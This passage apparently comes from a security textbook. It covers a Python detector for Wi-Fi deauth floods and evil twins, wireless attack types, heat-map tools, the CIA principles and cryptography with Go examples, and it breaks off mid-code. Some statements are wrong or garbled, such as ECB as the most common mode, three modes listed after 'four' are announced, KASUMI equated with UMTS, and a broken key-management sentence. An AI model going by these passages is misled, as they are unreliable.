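    elif rec["subtype"] == SUBTYPE_BEACON:
        ies, i = body[12:], 0
        while i + 2 <= len(ies):                 # walk the information elements
            tag, length = ies[i], ies[i + 1]
            if tag == 0:
                rec["ssid"] = ies[i + 2:i + 2 + length].decode("utf-8", "replace")
                break
            i += 2 + length
    return rec


def analyze(capture, authorized=AUTHORIZED, window=1.0, flood_threshold=10):
    """capture: list of (timestamp_seconds, raw_frame). One alert per offending
    BSSID: 'deauth_flood' once at least flood_threshold deauth/disassoc frames
    carry its address within `window` seconds, 'evil_twin' when a BSSID outside
    the authorized set beacons a protected SSID."""
    alerts, recent, flagged = [], defaultdict(deque), set()
    for ts, frame in capture:
        rec = parse_mgmt(frame)
        if rec is None:
            continue
        bssid = rec["bssid"]
        if rec["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            q = recent[bssid]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= flood_threshold and bssid not in flagged:
                flagged.add(bssid)
                alerts.append({"type": "deauth_flood", "bssid": bssid.hex(":"),
                               "count": len(q), "broadcast": rec["da"] == BROADCAST})
        elif rec["subtype"] == SUBTYPE_BEACON and rec.get("ssid") in authorized:
            if bssid not in authorized[rec["ssid"]] and bssid not in flagged:
                flagged.add(bssid)
                alerts.append({"type": "evil_twin", "ssid": rec["ssid"], "bssid": bssid.hex(":")})
    return alerts


def sample_capture():
    """Constructed capture: normal beacons, one evil twin, an aireplay-ng style
    burst of 64 broadcast deauths spoofed from AP1, and one legitimate deauth."""
    cap = []
    for i in range(20):
        cap.append((i * 0.1, beacon(AP1, "CorpWiFi")))
        cap.append((i * 0.1 + 0.05, beacon(AP2, "CorpWiFi")))
    cap.append((2.0, beacon(ROGUE, "CorpWiFi")))
    cap.append((2.1, beacon(ROGUE, "FreeAirportWiFi")))    # unknown SSID: not flagged here
    for i in range(64):
        cap.append((3.0 + i * 0.005, deauth(AP1)))
    cap.append((4.0, deauth(AP2, target=bytes.fromhex("66778899cc01"), reason=3)))
    return sorted(cap, key=lambda entry: entry[0])


if __name__ == "__main__":
    for alert in analyze(sample_capture()):
        print(alert)
```

The deauth flood is keyed on the BSSID in the frame, not on the sender's real identity, because a spoofed frame carries the AP's address: what gives the attack away is the rate and the broadcast destination, not the source.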

Misconfigured Access Point Attack
Misconfigured APs are the attack surface that is easiest to breach once detected. You are most
likely to meet misconfigured APs in home wireless networks or very small businesses. Large
wireless environments usually use centralized management platforms that control hundreds or
thousands of APs and keep them synchronized, so configuration errors are less likely there.
The most common areas of misconfiguration that lead to wireless compromise are:
1. AP settings left at factory defaults, such as usernames and passwords or the default
broadcast WLAN names (SSIDs); the defaults can be found in the vendor's manuals on the
Internet.
2. Human error: advanced security policies are configured on one set of APs across the
organization while others are forgotten and left with weak default security settings.

Ad-Hoc Connection Attack

Ad-Hoc Connection attacks are a very nasty type of attack, where the attacker (malicious user)
uses a 3rd party legitimate user as an additional hop or man-in-the-middle between the attacker's
device and the AP or other type of gateway.
The ad-hoc wireless network feature, which has to be working on the "device-in-the-middle", can be
configured on both Windows and Linux devices, and it allows setting up an ad-hoc (peer-to-peer)
wireless link between client devices (without any additional network infrastructure such as an AP).
Behind the scenes, what you actually do is create a virtual software AP on your PC, and
the other device associates with the SSID you have created (effectively making a wireless link).
When using Linux, you may use the tool called "airbase-ng" described earlier in this chapter. On
the other hand, when using Windows, the WLAN may be created in the wireless network settings
using "configure new connection or new network".

Heat Map Testing
A Wi-Fi heat map is a diagram of signal strength in a Wi-Fi network. Produced with a wireless
monitoring tool, a visual map of a workplace gives the network administrator invaluable knowledge
about how to adjust the access points (APs) for better coverage.
In general, a heat map is a graphical representation of data where the individual values contained
in a matrix are represented as colors. Fractal maps and tree maps both often use a similar system of
color-coding to represent the values taken by a variable in a hierarchy. Heat maps help you get
an instant feel for an area by grouping places into categories and displaying their density
visually. The darker the color, the higher the density.

Types of Heat Maps

1. Mouse move heat map: MouseStats Mouse Move Heatmaps is the only alternative solution
to eye-tracking at mass volume and an affordable cost. Based on millions of visitors' mouse
movement data, MouseStats creates a meaningful, comprehensive and simple-to-
understand heatmap for each page you want to analyze.
Usage
▪ Finding hidden UI issues
▪ Best places for advertisements

2. Network Atlas maps: Network Atlas is a powerful tool for creating custom maps and
network diagrams. The maps created in Network Atlas enable users to view a graphical
depiction of their network in the Orion Web Console. The maps can also be used to create
network documentation, which can then be printed and exported as needed.
Usage
▪ Monitor NPM nodes, interfaces, and volumes
▪ SAM applications and components
▪ Nested maps
▪ Display network links

3. Wi-Fi Coverage & Wireless Performance Heatmaps: Visualize heatmaps for signal/noise,
WLAN throughput, PHY data rates, retry rates, and packet losses at every location on the
floor.
Usage
▪ A good wireless network mapper will allow you to visualize your Wi-Fi coverage, signal
strength, noise and interference across your entire network area
▪ Troubleshoot poor Wi-Fi signal

4. Access Point Wireless Heat Maps: Heatmaps to view the coverage and performance of your
backup APs in case the primary APs are missing or down.
5. Channel Overlap WLAN Heat Maps: Used to see primary and secondary channel
overlap heatmaps, to mitigate channel interference and maximize the performance potential of
802.11 networks.

Tools to perform Heat Map Tests


1. Crazy Egg: Crazy Egg is one of the biggest names in the industry. It's easy to use, it
comes with a 30-day free trial, and there are 4 payment tiers to match every website's
demands. From a feature standpoint, Crazy Egg offers advanced features on its higher
tiers.

Features and Benefits

a. Heatmap Reports
b. Scrollmap Reports
c. Confetti Reports
d. Overlay Reports
e. List Reports
f. Multiple Domain Usage
g. A/B Testing Feature
h. Recordings feature

Pros
▪ Scrollmap shows how far users scroll before page abandonment.
▪ Site-clicks segmented by search terms and referral sources.
▪ Easy to determine what is hot on your site and make changes.

Cons
▪ The interface lacks user friendliness.
▪ Data collection can be sporadic.

Pricing
▪ Basic: The basic tier costs $9/month and tracks 10,000 visitors a month and 10
active pages.
▪ Standard: Standard is for growing websites and costs $19/month. This tier tracks
25,000 visitors a month and 20 active pages.
▪ Plus: The most "popular" option costs $49/month. Under Plus, 100,000 visitors are
tracked across 50 active pages with hourly reports offered. This tier also comes with:
1. Advanced filtering
2. Mobile heatmaps
3. Priority email support
▪ Pro: The final tier is the Pro tier and costs $99/month. Meant for large websites,
250,000 visitors are tracked across 100 pages. Hourly reports are provided, and
advanced features include:
1. Advanced filtering
2. Mobile heatmaps
3. Priority email support
4. Multiple users

2. Lucky Orange: Lucky Orange offers a great suite of tools that help you visualize visitor
behavior. It's all about the features (more on that shortly). Compared to Crazy Egg, for
example, Lucky Orange offers a wider range of tools to understand your users' behavior.
A 7-day free trial is offered (no credit card needed), and you'll be able to test out these
features for yourself.

Features & Benefits


a. Form Analytics
b. Real-time Analytics
c. Visitor Recordings / Live Sessions
d. Heatmaps (click, mouse movement and scrolling)
e. Live Visitor Map
f. Visitor Polls

Pros
▪ Offers a full suite of optimization tools all at one price.
▪ Beautiful dashboard that is easy to use.
▪ Screen recording allows for true visitor behavior viewing.
▪ Accurate data and easy setup.

Cons
▪ Too much data provides data “overload” with little actionable insights.

Pricing
▪ Small: Small allows you to track up to 3 sites and 50,000 monthly page views and have 2
chat operators. This tier costs $10/month.
▪ Medium: Medium allows 6 sites to be tracked, 100,000 monthly page views to be
logged, and 4 chat operators. Pricing is $20/month.
▪ Large: Large allows 12 sites to be tracked, 250,000 page views, and 8 chat operators.
Pricing is $50/month.
▪ Extra Large: The Extra Large tier enables 25 sites to be tracked, 1 million page views,
and 11 chat operators. This tier costs $100/month.

3. SolarWinds: The increasing demand for wireless devices means that you need a proper
management system. For example, it's difficult to assess Wi-Fi coverage because you
cannot see dead-spots with the naked eye. Throughout this review keep in mind that
managing wireless heat maps is only one part of what SolarWinds Network Performance
Monitor can do for your enterprise.

Features and Benefits


a. Monitor Wireless Networks
b. Manage Interfaces
c. Troubleshoot Unknown Nodes
d. Set up and monitor Cisco Unified Computing Systems (UCS)
e. Create wireless heat maps
f. Disable the wireless heat map poller
g. Set a floor plan as the background
h. Set the wireless heat map scale
i. Add wireless access points

Pros
▪ Offers a full suite of optimization tools all at one price.
▪ User friendly dashboard with good documentation.

Cons
▪ Does not provide complete accuracy, making it a bit unreliable.
▪ A few obsolete features have not yet been removed from the tool.
Pricing
▪ 30-day free trial, but pricing starts from 2895 USD

Fundamental Concepts followed in cyber security for data
security
Confidentiality
When we talk about confidentiality of information, we are talking about protecting the
information from disclosure to unauthorized parties.
Disclosure can be of two types: intended or unintended. A key component of protecting
information confidentiality is encryption. Encryption ensures that only the right people
(people who know the key) can read the information. Encryption is VERY widespread in
today's environment and can be found in almost every major protocol in use. A very prominent
example is SSL/TLS, a security protocol for communications over the internet that has been
used in conjunction with a large number of internet protocols to ensure security.
Other ways to ensure information confidentiality include enforcing file permissions and access
control lists to restrict access to sensitive information.

The biggest threats to confidentiality of information are as follows:

• Social Engineering Attacks: the use of deception to manipulate individuals into divulging
confidential or personal information that may be used for fraudulent purposes.
Preventive Measures
▪ Layering of defense
▪ Separation of duties
▪ Employee training
• Media Reuse: It's a known fact that deleting a file does not actually delete the contents of
the file, but rather deletes the pointer to that file. Neither is formatting a drive an option, as a
forensics expert can extract most of the data/information that was present on that drive.
Preventive Measures
▪ Destroy the hard drive by shredding
• Eavesdropping by setting up packet sniffers and rogue infrastructure such as a DNS server or
domain controller:
Preventive Measures
▪ Using Kerberos

Integrity
Integrity of information refers to protecting information from being modified by unauthorized
parties.
Information only has value if it is correct. Information that has been tampered with could prove
costly. For example, if you were sending an online money transfer for $100, but the information
was tampered with in such a way that you actually sent $10,000, it could prove to be very costly for
you.
As with data confidentiality, cryptography plays a very major role in ensuring data integrity.
Commonly used methods to protect data integrity include hashing the data you receive and
comparing it with the hash of the original message. However, this means that the hash of the
original data must be provided to you in a secure fashion. More convenient methods would be to
use existing schemes such as GPG to digitally sign the data.
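The $100 transfer above, worked through as an added example (not from the report): a bare hash travelling with the message is recomputed by whoever changes the amount, whereas an HMAC keyed with a secret shared by sender and bank cannot be re-tagged. The transfer fields, key and amounts are constructed for the demo.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// Transfer is a constructed stand-in for the online money transfer from the text.
type Transfer struct {
	From, To string
	Amount   int // in dollars
}

// Encode serialises the transfer into the bytes that are hashed or authenticated.
func (t Transfer) Encode() []byte {
	return []byte(fmt.Sprintf("from=%s;to=%s;amount=%d", t.From, t.To, t.Amount))
}

// PlainHash is the bare hash-and-compare scheme. Anyone who can rewrite the
// message can also recompute this value, so by itself it only catches
// accidental corruption, not deliberate tampering.
func PlainHash(msg []byte) string {
	sum := sha256.Sum256(msg)
	return hex.EncodeToString(sum[:])
}

// HashAccepts models a receiver who checks a hash that travelled over the same
// (untrusted) channel as the message.
func HashAccepts(msg []byte, sentHash string) bool {
	return PlainHash(msg) == sentHash
}

// Tag computes HMAC-SHA256 over msg with a key shared only by sender and bank;
// without the key an attacker cannot produce a tag for a modified message.
func Tag(key, msg []byte) []byte {
	mac := hmac.New(sha256.New, key)
	mac.Write(msg)
	return mac.Sum(nil)
}

// Verify recomputes the tag and compares it in constant time.
func Verify(key, msg, tag []byte) bool {
	return hmac.Equal(Tag(key, msg), tag)
}

func main() {
	key := []byte("constructed-shared-key-do-not-reuse")
	orig := Transfer{From: "alice", To: "bob", Amount: 100}
	bad := Transfer{From: "alice", To: "bob", Amount: 10000}

	// Bare hash: the attacker replaces both the message and its hash.
	fmt.Println("hash check accepts tampered transfer:",
		HashAccepts(bad.Encode(), PlainHash(bad.Encode()))) // true

	// HMAC: the message can be changed but not re-tagged without the key.
	tag := Tag(key, orig.Encode())
	fmt.Println("HMAC check accepts tampered transfer:",
		Verify(key, bad.Encode(), tag)) // false
}
```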

Availability
Availability of information refers to ensuring that authorized parties are able to access the
information when needed.
Information only has value if the right people can access it at the right times. Denying access to
information has become a very common attack nowadays. Almost every week you can find news
about high profile websites being taken down by DDoS attacks. The primary aim of DDoS
attacks is to deny users of the website access to the resources of the website. Such downtime can
be very costly. Other factors that could lead to lack of availability to important information may
include accidents such as power outages or natural disasters such as floods.
How does one ensure data availability? Backup is key. Regularly doing off-site backups can
limit the damage caused by damage to hard drives or natural disasters. For information services
that are highly critical, redundancy might be appropriate. Having an off-site location ready to
restore services in case anything happens to your primary data centers will heavily reduce the
downtime in case anything happens.

Non-Repudiation
Non-repudiation refers to a state of affairs where the author of a statement will not be able to
successfully challenge the authorship of the statement or validity of an associated contract. The
term is often seen in a legal setting wherein the authenticity of a signature is being challenged. In
such an instance, the authenticity is being "repudiated".
In a general sense non-repudiation involves associating actions or changes to a unique individual.
For a secure area, for example, it may be desirable to implement a key card access system. Non-
repudiation would be violated if it were not also a strictly enforced policy to prohibit sharing of
the key cards and to immediately report lost or stolen cards. Otherwise, who performed the action
of opening the door cannot be trivially determined. Similarly, for computer
accounts, the individual owner of the account must not allow others to use that account,
especially, for instance, by giving away their account's password, and a policy should be
implemented to enforce this. This prevents the owner of the account from denying actions
performed by the account.

Access Control
Access control is the ability to limit and control the access to host systems and applications via
communications links. To achieve this, each entity trying to gain access must first be identified,
or authenticated, so that access rights can be tailored to the individual.

Network Security Model
Network security involves all tools, devices, strategies and activities which enterprises and
organizations undertake to protect their networks, data and operations. An effective network
security strategy must include the most effective set of tools for identifying and repelling
various threats and attacks. Creating a well thought-out network security model will effectively
help you realize your network's security.

The network security model (NSM) is a scheme that reflects the general plan and the policy for
ensuring network security, and usually includes all or some of the following seven layers in
different modifications according to the specific company's needs:

1. Physical layer - involves organization of physical security against access to the data
on computer devices; this can be access control devices, cameras, alarms.
2. VLAN layer - involves creation of Virtual Local Area Networks (VLANs) which join
together common hosts for security purposes.
3. ACL layer - supposes creation and maintenance of Access Control Lists (ACLs) which
allow or deny access between hosts on different networks.
4. Software layer - helps to protect the user layer and ensures the software is kept up to date.
5. User layer - involves training users in security on the network.
6. Administrative layer - supposes the training of administrative users.
7. IT department layer - this layer is the most important for network security; it contains
all network security professionals and support specialists, network technicians and
architects, who organize and maintain the work of the network and hosts.

Cryptographic measures to increase network security
• Key Management in Cloud based services
Encryption provides data protection (integrity) while key management enables access to
protected data (access control). It is strongly recommended to encrypt data in transit over
networks, at rest, and on backup media. In particular, data to encrypt their own data. Both
encryption and key management are very important to help secure applications and data
stored in the Cloud. Requirements of effective key management are discussed below. But a
constraint needs to be kept in mind: the performance of the system should not decline
much due to the integration of cryptographic policies.

1. Secure key stores: The key stores themselves must be protected from malicious users. If
a malicious user gains access to the keys, they will then be able to access any encrypted
data the key corresponds to. Hence the key stores themselves must be protected in
storage, in transit and on backup media.
2. Access to key stores: Access to the key stores should be limited to the users that have the
rights to access the data. Separation of roles should be used to help control access. The entity
that uses a given key should not be the entity that stores the key.
3. Key backup and recoverability: Keys need secure backup and recovery solutions. Loss
of keys, although effective for destroying access to data, can be highly devastating to a
business, and Cloud providers need to ensure that keys aren't lost through backup and
recovery mechanisms.
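Requirements 2 and 3 above (the key user is not the key store; keys must survive backup) are what envelope encryption gives you. The following added example, not from the report or any cloud provider's SDK, wraps a per-record data key (DEK) under a key-encryption key (KEK) that only a KeyStore type holds; the application encrypts with the DEK and stores only the wrapped copy beside the data. The tenant label and record contents are constructed for the demo.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// KeyStore holds the key-encryption key and only ever hands out wrapped or
// unwrapped data-encryption keys; it never sees the data being protected.
type KeyStore struct {
	kek []byte // 32-byte AES-256 key; in production this lives in an HSM/KMS
}

func NewKeyStore() (*KeyStore, error) {
	kek := make([]byte, 32)
	if _, err := io.ReadFull(rand.Reader, kek); err != nil {
		return nil, err
	}
	return &KeyStore{kek: kek}, nil
}

// sealGCM encrypts and authenticates plaintext (and aad) under key with a
// fresh random nonce, which is prepended to the output.
func sealGCM(key, plaintext, aad []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, aad), nil
}

// openGCM reverses sealGCM and fails if the blob, key or aad does not match.
func openGCM(key, sealed, aad []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(sealed) < gcm.NonceSize() {
		return nil, errors.New("ciphertext too short")
	}
	nonce, ct := sealed[:gcm.NonceSize()], sealed[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ct, aad)
}

// GenerateDEK returns a fresh DEK for immediate use plus its wrapped form,
// which is what gets stored and backed up next to the data. The label is
// authenticated so a wrapped DEK cannot be moved between tenants.
func (s *KeyStore) GenerateDEK(label string) (dek, wrapped []byte, err error) {
	dek = make([]byte, 32)
	if _, err = io.ReadFull(rand.Reader, dek); err != nil {
		return nil, nil, err
	}
	wrapped, err = sealGCM(s.kek, dek, []byte(label))
	return dek, wrapped, err
}

// UnwrapDEK recovers a DEK (e.g. after a restore); it fails on a tampered
// blob, a different label, or a KEK other than the one that wrapped it.
func (s *KeyStore) UnwrapDEK(label string, wrapped []byte) ([]byte, error) {
	return openGCM(s.kek, wrapped, []byte(label))
}

// The application side touches only the DEK.
func EncryptRecord(dek, record []byte) ([]byte, error) { return sealGCM(dek, record, nil) }
func DecryptRecord(dek, blob []byte) ([]byte, error)   { return openGCM(dek, blob, nil) }

func main() {
	store, _ := NewKeyStore()
	dek, wrapped, _ := store.GenerateDEK("tenant-a/db1")
	blob, _ := EncryptRecord(dek, []byte("constructed secret record"))
	// Later, after restoring blob and wrapped from backup:
	dek2, _ := store.UnwrapDEK("tenant-a/db1", wrapped)
	pt, _ := DecryptRecord(dek2, blob)
	fmt.Println(string(pt))
}
```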

• Cryptography Mechanism
Cryptography is a method of storing and transmitting data in a particular form so that only
those for whom it is intended can read and process it. The term is most often associated with
scrambling plaintext message (ordinary text, sometimes referred to as cleartext) into
ciphertext (a process called encryption), then back again (known as decryption). There are, in
general, three types of cryptographic schemes typically used to accomplish these goals:
secret key (or symmetric) cryptography, public-key (or asymmetric) cryptography, and hash
functions, each of which is described below.

▪ Secret Key Cryptography

With secret key cryptography, a single key is used for both encryption and decryption. As
shown in Figure 2, the sender A uses the key K (or some set of rules) to encrypt the
plaintext message M and sends the ciphertext C to the receiver. The receiver applies the
same key K (or ruleset) to decrypt the ciphertext C and recover the plaintext message M.
Because a single key is used for both functions, secret key cryptography is also called
symmetric encryption. With this form of cryptography, it is obvious that the key must be
known to both the sender and the receiver; that shared encryption and decryption key is, in
fact, the secret. The biggest difficulty with this approach, of course, is the distribution
of the key. Secret key cryptography schemes are generally categorized as being either
stream ciphers or block ciphers. Stream ciphers operate on a single bit (byte or computer
word) at a time and implement some form of feedback mechanism so that the key is
constantly changing. A block cipher is so called because the scheme encrypts one block
of data at a time using the same key on each block. In general, the same plaintext block
will always encrypt to the same ciphertext when using the same key in a block cipher,
whereas the same plaintext will encrypt to different ciphertext in a stream cipher.

Block ciphers can operate in one of several modes; the following four are the most
important:

1. Electronic Codebook (ECB) mode is the simplest, most obvious application: the
secret key is used to encrypt the plaintext block to form a ciphertext block. Two
identical plaintext blocks, then, will always generate the same ciphertext block.
Although this is the most common mode of block ciphers, it is susceptible to a variety
of brute-force attacks.
2. Cipher Block Chaining (CBC) mode adds a feedback mechanism to the encryption
scheme. In CBC, the plaintext is exclusive-ORed (XORed) with the previous
ciphertext block prior to encryption. In this mode, two identical blocks of plaintext
never encrypt to the same ciphertext.
3. Cipher Feedback (CFB) mode is a block cipher implementation as a self-
synchronizing stream cipher. CFB mode allows data to be encrypted in units smaller
than the block size, which might be useful in some applications such as encrypting
interactive terminal input. If we were using 1-byte CFB mode, for example, each
incoming character is placed into a shift register the same size as the block,
encrypted, and the block transmitted. At the receiving side, the ciphertext is decrypted
and the extra bits in the block (i.e., everything above and beyond the one byte) are
discarded.
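The difference between the three modes can be measured directly. This added example (not from the report) encrypts four identical 16-byte plaintext blocks under AES in ECB, CBC and CFB mode and counts repeated ciphertext blocks; ECB is hand-rolled because Go's standard library deliberately omits it. The key, IV and plaintext are fixed, constructed values so the result is repeatable.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// ecbEncrypt applies the block cipher to each block independently, with no
// chaining: identical plaintext blocks give identical ciphertext blocks.
func ecbEncrypt(block cipher.Block, plaintext []byte) []byte {
	bs := block.BlockSize()
	if len(plaintext)%bs != 0 {
		panic("plaintext must be a whole number of blocks")
	}
	out := make([]byte, len(plaintext))
	for i := 0; i < len(plaintext); i += bs {
		block.Encrypt(out[i:i+bs], plaintext[i:i+bs])
	}
	return out
}

// cbcEncrypt XORs each plaintext block with the previous ciphertext block
// (the IV for the first block) before encrypting it.
func cbcEncrypt(block cipher.Block, iv, plaintext []byte) []byte {
	out := make([]byte, len(plaintext))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, plaintext)
	return out
}

// cfbEncrypt runs the block cipher as a self-synchronising stream cipher, so
// the input does not need to be block-aligned.
func cfbEncrypt(block cipher.Block, iv, plaintext []byte) []byte {
	out := make([]byte, len(plaintext))
	cipher.NewCFBEncrypter(block, iv).XORKeyStream(out, plaintext)
	return out
}

// RepeatedBlocks counts ciphertext blocks that exactly repeat an earlier
// block; any non-zero count leaks structure of the plaintext.
func RepeatedBlocks(ct []byte) int {
	seen := map[string]bool{}
	n := 0
	for i := 0; i+aes.BlockSize <= len(ct); i += aes.BlockSize {
		k := string(ct[i : i+aes.BlockSize])
		if seen[k] {
			n++
		}
		seen[k] = true
	}
	return n
}

// Compare encrypts the same plaintext under ECB, CBC and CFB and returns the
// number of repeated ciphertext blocks each mode produced.
func Compare(key, iv, plaintext []byte) (ecbDup, cbcDup, cfbDup int, err error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return 0, 0, 0, err
	}
	return RepeatedBlocks(ecbEncrypt(block, plaintext)),
		RepeatedBlocks(cbcEncrypt(block, iv, plaintext)),
		RepeatedBlocks(cfbEncrypt(block, iv, plaintext)), nil
}

func main() {
	key := bytes.Repeat([]byte{0x11}, 16) // constructed fixed key for a repeatable demo
	iv := bytes.Repeat([]byte{0x22}, 16)
	plaintext := bytes.Repeat([]byte("SAME 16-BYTE BLK"), 4) // four identical blocks
	e, c, f, _ := Compare(key, iv, plaintext)
	fmt.Printf("repeated blocks: ECB=%d CBC=%d CFB=%d\n", e, c, f) // ECB=3 CBC=0 CFB=0
}
```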

Secret key cryptography algorithms that are in use today include:

1. Data Encryption Standard (DES): DES is a block cipher employing a 56-bit key
that operates on 64-bit blocks. The DES algorithm, as described by Davis R., takes a fixed-
length string of plaintext bits and transforms it through a series of complicated
operations into a ciphertext bit string of the same length. 3DES (Triple DES) [6] is an
enhancement of DES; it has a 64-bit block size with a 192-bit key size. In this standard
the encryption method is similar to the one in the original DES but applied 3 times to
increase the encryption level and the average safe time.
2. Advanced Encryption Standard (AES): AES is a block cipher intended to replace
DES for commercial applications. It uses a 128-bit block size and a key size of 128,
192, or 256 bits. The number of internal rounds of the cipher is a function of the key
length. The number of rounds for a 128-bit key is 10. Unlike its predecessor DES, AES
does not use a Feistel network. Feistel networks do not encrypt an entire block per
iteration, e.g., in DES, 64/2 = 32 bits are encrypted in one round. AES, on the other
hand, encrypts all 128 bits in one iteration.
3. Blowfish: Blowfish is a symmetric 64-bit block cipher, invented by Bruce Schneier;
optimized for 32-bit processors with large data caches, it is significantly faster than
DES on a Pentium/PowerPC-class machine. Key lengths can vary from 32 to 448 bits
in length. Blowfish, available freely and intended as a substitute for DES or IDEA, is
in use in a large number of products. It is a 16-round Feistel cipher and uses large
key-dependent S-boxes. The S-boxes accept 8-bit input and produce 32-bit output.
One entry of the P-array is used every round, and after the final round, each half of
the data block is XORed with one of the two remaining unused P-entries.
4. Twofish: A 128-bit block cipher using 128-, 192-, or 256-bit keys. Designed to be
highly secure and highly flexible, well-suited for large microprocessors, 8-bit smart
card microprocessors, and dedicated hardware. Designed by a team led by Bruce
Schneier and was one of the Round 2 algorithms in the AES process. Twofish's
distinctive features are the use of pre-computed key-dependent S-boxes, and a
relatively complex key schedule. One half of an n-bit key is used as the actual
encryption key and the other half of the n-bit key is used to modify the encryption
algorithm (key-dependent S-boxes). Twofish borrows some elements from other
designs; for example, the pseudo-Hadamard transform(PHT) from the SAFER family
of ciphers. Twofish has a Feistel structure like DES.
5. Camellia: A secret-key, block-cipher crypto algorithm developed jointly by Nippon
Telegraph and Telephone (NTT) Corp. and Mitsubishi Electric Corporation (MEC) in
2000. Camellia has some characteristics in common with AES: a 128-bit block size, support
for 128-, 192-, and 256-bit key lengths, and suitability for both software and hardware
implementations on common 32-bit processors as well as 8-bit processors (e.g., smart
cards, cryptographic hardware, and embedded systems). Camellia is a Feistel cipher
with either 18 rounds (when using 128-bit keys) or 24 rounds (when using 192 or
256-bit keys). Every six rounds, a logical transformation layer is applied: the so-
called "FL-function" or its inverse. Camellia uses four 8 x 8-bit S-boxes with input
and output affine transformations and logical operations. The cipher also uses input
and output key whitening. The diffusion layer uses a linear transformation based on a
matrix with a branch number of 5.
6. KASUMI: A block cipher using a 128-bit key and a 64-bit block size, it is part of the
Third-Generation Partnership Project (3GPP), formerly known as the Universal
Mobile Telecommunications System (UMTS). KASUMI is the intended
confidentiality and integrity algorithm for both message content and signaling data
for emerging mobile communications systems. KASUMI is used in the A5/3 key
stream generator and in GPRS in the GEA3 key stream generator. In 2010,
Dunkelman, Keller and Shamir published a new attack that allows an adversary to
recover a full A5/3 key by a related-key attack. The core of KASUMI is an eight-round
Feistel network. The round functions in the main Feistel network are irreversible
Feistel-like network transformations. In each round the round function uses a round
key which consists of eight 16-bit sub keys derived from the original 128-bit key
using a fixed key schedule.

Nowadays the Advanced Encryption Standard (AES) is the most commonly used secret
key encryption algorithm.

▪ Public-key cryptography is a form of cryptosystem in which encryption and decryption
are performed using different keys: one a public key and one a private key. These
keys are mathematically related, although knowledge of one key does not allow someone
to easily determine the other key. As shown in Figure 3, the sender A uses the public key
of receiver B (or some set of rules) to encrypt the plaintext message M and sends the
ciphertext C to the receiver. The receiver applies its own private key (or ruleset) to decrypt
the ciphertext C and recover the plaintext message M. Because a pair of keys is required,
this approach is also called asymmetric cryptography. Asymmetric encryption can be
used for confidentiality, authentication, or both.

RSA
The first, and still most common, public key cryptography implementation, named for the
three MIT mathematicians who developed it — Ronald Rivest, Adi Shamir, and Leonard
Adleman. RSA today is used in hundreds of software products and can be used for key
exchange, digital signatures, or encryption of small blocks of data. RSA uses a variable
size encryption block and a variable size key. The key-pair is derived from a very large
number, n, that is the product of two prime numbers chosen according to special rules;
these primes may be 100 or more digits in length each, yielding an n with roughly twice
as many digits as the prime factors. RSA has three phases: Key Generation, Encryption,
and Decryption.

• Elliptic Curve Cryptography: It is an analog of Diffie-Hellman Key Exchange. ECC [16, 17]
is a public key cryptography algorithm based upon elliptic curves. Elliptic curve arithmetic
can be used to develop a variety of elliptic curve cryptography (ECC) schemes, including key
exchange, encryption, and digital signature. For purposes of ECC, elliptic curve arithmetic
involves the use of an elliptic curve equation defined over a finite field. The coefficients and
variables in the equation are elements of a finite field. The security of ECC is based on the
intractability of the ECDLP, i.e. the Elliptic Curve Discrete Logarithm Problem.
• Digital Signature Standard
The Digital Signature Standard (DSS) is an NIST standard that uses the Secure Hash Algorithm
(SHA) [18]. A digital signature is an authentication mechanism that enables the creator of a
message to attach a code that acts as a signature. Typically, the signature is formed by taking
the hash of the message and encrypting that hash with the creator's private key. The
signature guarantees the source and integrity of the message.
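The RSA phases (key generation, encryption, decryption) and the hash-then-sign construction just described, as one added example that is not part of the report: A encrypts a small message under B's public key, and separately signs the SHA-256 digest with A's own private key so B can check source and integrity. Party names, message text and the 2048-bit keys generated on each run are constructed for the demo.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// Party holds one participant's RSA key pair (generated fresh each run; a
// constructed example, not a production key store).
type Party struct {
	Name string
	priv *rsa.PrivateKey
}

// NewParty is the key generation phase: n is the product of two large primes
// chosen by the library, and the public/private exponents are derived from it.
func NewParty(name string) (*Party, error) {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	return &Party{Name: name, priv: priv}, nil
}

func (p *Party) Public() *rsa.PublicKey { return &p.priv.PublicKey }

// Encrypt is the encryption phase: sender A uses receiver B's public key, so
// only B's private key can recover M. OAEP padding limits the plaintext to a
// few hundred bytes, which is why RSA is used for "small blocks of data".
func Encrypt(to *rsa.PublicKey, msg []byte) ([]byte, error) {
	return rsa.EncryptOAEP(sha256.New(), rand.Reader, to, msg, nil)
}

// Decrypt is the decryption phase, run by the holder of the private key.
func (p *Party) Decrypt(ct []byte) ([]byte, error) {
	return rsa.DecryptOAEP(sha256.New(), rand.Reader, p.priv, ct, nil)
}

// Sign hashes the message and applies the signer's private key to the digest,
// the construction the DSS paragraph describes.
func (p *Party) Sign(msg []byte) ([]byte, error) {
	digest := sha256.Sum256(msg)
	return rsa.SignPKCS1v15(rand.Reader, p.priv, crypto.SHA256, digest[:])
}

// VerifySignature reports whether sig was produced over msg by the owner of pub.
func VerifySignature(pub *rsa.PublicKey, msg, sig []byte) bool {
	digest := sha256.Sum256(msg)
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, digest[:], sig) == nil
}

func main() {
	a, _ := NewParty("A")
	b, _ := NewParty("B")
	msg := []byte("constructed message M from A to B")
	sig, _ := a.Sign(msg)              // A signs with A's private key
	ct, _ := Encrypt(b.Public(), msg)  // A encrypts with B's public key
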